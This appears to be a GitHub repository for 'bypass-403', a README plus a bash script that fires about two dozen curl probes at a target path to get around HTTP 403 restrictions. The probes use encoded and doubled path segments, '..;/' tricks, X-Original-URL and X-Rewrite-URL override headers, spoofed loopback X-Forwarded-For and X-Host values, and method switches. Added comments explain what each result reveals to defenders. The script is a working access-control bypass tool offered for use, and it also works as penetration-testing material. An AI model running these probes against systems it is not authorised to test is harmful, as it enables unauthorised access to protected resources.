├── README.md
├── bypass-403.sh
└── responses.jpg

/README.md:
--------------------------------------------------------------------------------
# Bypass-403
- A simple script, made for personal use, for bypassing 403
- It can also be used to compare responses under various conditions, as shown in the screenshot below
![](responses.jpg)

# Usage
`./bypass-403.sh https://example.com admin`

`./bypass-403.sh website-here path-here`

# Features
- Use 24 known Bypasses for 403 with the help of curl

# Installation
* `git clone https://github.com/iamj0ker/bypass-403`
* `cd bypass-403`
* `chmod +x bypass-403.sh`
* `sudo apt install figlet` - If you are unable to see the logo as in the screenshot
* `sudo apt install jq` - If you don't have jq installed on your machine

# Contributors
[remonsec](https://github.com/remonsec),
[manpreet](https://github.com/manpreet406)
[MayankPandey01](https://github.com/MayankPandey01)
[saadibabar](https://github.com/saadibabar)

--------------------------------------------------------------------------------
/bypass-403.sh:
--------------------------------------------------------------------------------
#! /bin/bash
figlet Bypass-403
echo " By Iam_J0ker"
echo "./bypass-403.sh https://example.com path"
echo " "
curl -k -s -o /dev/null -iL -w "%{http_code}","%{size_download}" $1/$2
echo " --> ${1}/${2}"
curl -k -s -o /dev/null -iL -w "%{http_code}","%{size_download}" $1/%2e/$2
echo " --> ${1}/%2e/${2}"
curl -k -s -o /dev/null -iL -w "%{http_code}","%{size_download}" $1/$2/.
echo " --> ${1}/${2}/."
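# Probes, part 2: path variants, override headers and trailing characters.
#
# Every curl prints "<status>,<bytes>" and discards the body. Because -L follows
# redirects, the status is that of the final response, so a 200 can simply be a
# login or error page reached through a redirect; compare the byte count with
# the plain $1/$2 request at the top of the script before drawing conclusions.
# -k disables TLS certificate verification, so the result does not prove which
# host answered.
# URL arguments are quoted so the shell cannot word-split them or expand "?"
# as a filename pattern against the current directory.

# Doubled slashes. A different status from the baseline means the component
# enforcing the 403 and the component serving the path normalise "//"
# differently; the rule should be applied to the normalised path.
curl -k -s -o /dev/null -iL -w "%{http_code},%{size_download}" "$1//$2//"
echo " --> ${1}//${2}//"

# "/./" segments. NOTE: curl removes dot segments from the path before sending
# unless it is run with --path-as-is, so this request may reach the server as
# the plain path; read the result with that in mind.
curl -k -s -o /dev/null -iL -w "%{http_code},%{size_download}" "$1/./$2/./"
echo " --> ${1}/./${2}/./"

# Path-override header. If the front end checks the request line while the
# application routes on this header, the access rule is skipped; a changed
# status means the header should be stripped or ignored at the edge.
curl -k -s -o /dev/null -iL -w "%{http_code},%{size_download}" -H "X-Original-URL: $2" "$1/$2"
echo " --> ${1}/${2} -H X-Original-URL: ${2}"

# Client-address headers set to loopback. A changed status means something
# upstream trusts a client-supplied address for access decisions; such headers
# should only be honoured when they come from a known proxy.
curl -k -s -o /dev/null -iL -w "%{http_code},%{size_download}" -H "X-Custom-IP-Authorization: 127.0.0.1" "$1/$2"
echo " --> ${1}/${2} -H X-Custom-IP-Authorization: 127.0.0.1"
curl -k -s -o /dev/null -iL -w "%{http_code},%{size_download}" -H "X-Forwarded-For: http://127.0.0.1" "$1/$2"
echo " --> ${1}/${2} -H X-Forwarded-For: http://127.0.0.1"
curl -k -s -o /dev/null -iL -w "%{http_code},%{size_download}" -H "X-Forwarded-For: 127.0.0.1:80" "$1/$2"
echo " --> ${1}/${2} -H X-Forwarded-For: 127.0.0.1:80"

# Second path-override header; the request line carries only the base URL and
# the protected path travels in the header.
curl -k -s -o /dev/null -iL -w "%{http_code},%{size_download}" -H "X-rewrite-url: $2" "$1"
echo " --> ${1} -H X-rewrite-url: ${2}"

# Trailing encoded space, encoded tab and empty query string. A status that
# differs from the baseline shows the access rule matches the path more
# strictly than the backend resolves it.
curl -k -s -o /dev/null -iL -w "%{http_code},%{size_download}" "$1/$2%20"
echo " --> ${1}/${2}%20"
curl -k -s -o /dev/null -iL -w "%{http_code},%{size_download}" "$1/$2%09"
echo " --> ${1}/${2}%09"
curl -k -s -o /dev/null -iL -w "%{http_code},%{size_download}" "$1/$2?"
echo " --> ${1}/${2}?"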
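# Probes, part 3: suffixes, methods, host headers and the archive lookup.
#
# Every probe prints "<status>,<bytes>" for the final response after redirects
# (-L) and discards the body. URL arguments are quoted so the shell cannot
# word-split them or expand "*" and "?" against files in the current directory.

# Extension and query suffixes. A status that differs from the baseline means
# the access rule matches the literal path while the backend maps the suffixed
# form to the same resource.
curl -k -s -o /dev/null -iL -w "%{http_code},%{size_download}" "$1/$2.html"
echo " --> ${1}/${2}.html"
curl -k -s -o /dev/null -iL -w "%{http_code},%{size_download}" "$1/$2/?anything"
echo " --> ${1}/${2}/?anything"

# Trailing "#". curl does not transmit the fragment, so on the wire this is the
# same request as the baseline; expect the same result.
curl -k -s -o /dev/null -iL -w "%{http_code},%{size_download}" "$1/$2#"
echo " --> ${1}/${2}#"

# Empty-body POST. A changed status means the rule is scoped to specific HTTP
# methods rather than to the resource.
curl -k -s -o /dev/null -iL -w "%{http_code},%{size_download}" -H "Content-Length:0" -X POST "$1/$2"
echo " --> ${1}/${2} -H Content-Length:0 -X POST"

# Literal "*" path segment (previously unquoted, so the shell could expand it).
curl -k -s -o /dev/null -iL -w "%{http_code},%{size_download}" "$1/$2/*"
echo " --> ${1}/${2}/*"
curl -k -s -o /dev/null -iL -w "%{http_code},%{size_download}" "$1/$2.php"
echo " --> ${1}/${2}.php"
curl -k -s -o /dev/null -iL -w "%{http_code},%{size_download}" "$1/$2.json"
echo " --> ${1}/${2}.json"

# TRACE. Anything other than a rejection suggests the method is enabled and
# should be disabled on the server.
curl -k -s -o /dev/null -iL -w "%{http_code},%{size_download}" -X TRACE "$1/$2"
echo " --> ${1}/${2} -X TRACE"

# NOTE(review): the next three probes omit -k, unlike the rest of the script.
# On a host with an untrusted certificate they fail TLS verification and print
# 000 instead of an HTTP status; do not read that as a different server answer.

# Host-override header set to loopback. A changed status means routing or
# access decisions depend on a client-supplied host value.
curl -s -o /dev/null -iL -w "%{http_code},%{size_download}" -H "X-Host: 127.0.0.1" "$1/$2"
echo " --> ${1}/${2} -H X-Host: 127.0.0.1"

# Semicolon path parameters. A changed status means the front end and the
# application container parse ";" in the path differently.
curl -s -o /dev/null -iL -w "%{http_code},%{size_download}" "$1/$2..;/"
echo " --> ${1}/${2}..;/"
# The original passed " $1/$2;/" with a leading space inside the quotes, so the
# URL given to curl did not match the label printed below; the space is removed.
curl -s -o /dev/null -iL -w "%{http_code},%{size_download}" "$1/$2;/"
echo " --> ${1}/${2};/"

# updated: probes added later. The TRACE request repeats the one above and is
# kept so the output listing stays the same.
curl -k -s -o /dev/null -iL -w "%{http_code},%{size_download}" -X TRACE "$1/$2"
echo " --> ${1}/${2} -X TRACE"
# Also runs without -k; see the note above.
curl -s -o /dev/null -iL -w "%{http_code},%{size_download}" -H "X-Forwarded-Host: 127.0.0.1" "$1/$2"
echo " --> ${1}/${2} -H X-Forwarded-Host: 127.0.0.1"

# Archive lookup. This sends the tested host and path to archive.org, a third
# party, so the target URL is disclosed outside the test. The URL is quoted so
# "?" is not treated as a shell pattern; jq prints the closest snapshot's
# "available" and "url" fields.
echo "Way back machine:"
curl -s "https://archive.org/wayback/available?url=$1/$2" | jq -r '.archived_snapshots.closest | {available, url}'

--------------------------------------------------------------------------------
/responses.jpg:
--------------------------------------------------------------------------------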
https://raw.githubusercontent.com/iamj0ker/bypass-403/94ed64f9ae75f3313a29822025f9b62c9a73ad97/responses.jpg --------------------------------------------------------------------------------